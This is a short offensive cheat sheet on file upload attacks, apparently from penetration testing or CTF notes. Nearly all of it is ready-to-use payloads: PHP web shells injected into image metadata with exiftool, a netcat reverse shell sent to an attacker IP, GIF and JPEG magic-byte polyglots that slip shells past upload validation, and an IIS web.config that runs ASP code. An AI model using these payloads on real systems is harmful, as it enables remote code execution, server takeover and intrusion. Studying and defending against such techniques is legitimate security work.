# File Upload

# RCE through image metadata

# SIMPLE RCE
exiftool -Comment='<?php system($_GET['cmd']); ?>' cat.jpg

# REVERSE SHELL
exiftool -Comment='<?php system("nc <YourIP> <YourPort> -e /bin/bash"); ?>' filename.png

When upload remember the Content-type: application/x-php.

# GIF

Create a file with the GIF magic bytes.

GIF89a;
<?php system($_GET['cmd']); ?>

# Magic Shell

Merge php code with valid upload file header.

File shell.php:

<?php echo "We have RCE\n"; system($_REQUEST['cmd']); ?>

Merge the magic bytes of a image to shell.php to bypass validation:

$ head -c 20 image.jpg > magic-bytes
$ cat magic-bytes shell.php > magical-shell.php.jpg

Usually the file needs to end in .php to have code execution. However, sometimes the .htaccess is misconfigured and allows .php.jpg to execute code as well.

Why magical-shell.php.jpg can execute code?

# Web.config

For old IIS web servers (7.5). You can put ASPX code on the bottom of a web.config file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

See Ippsec Bounty video.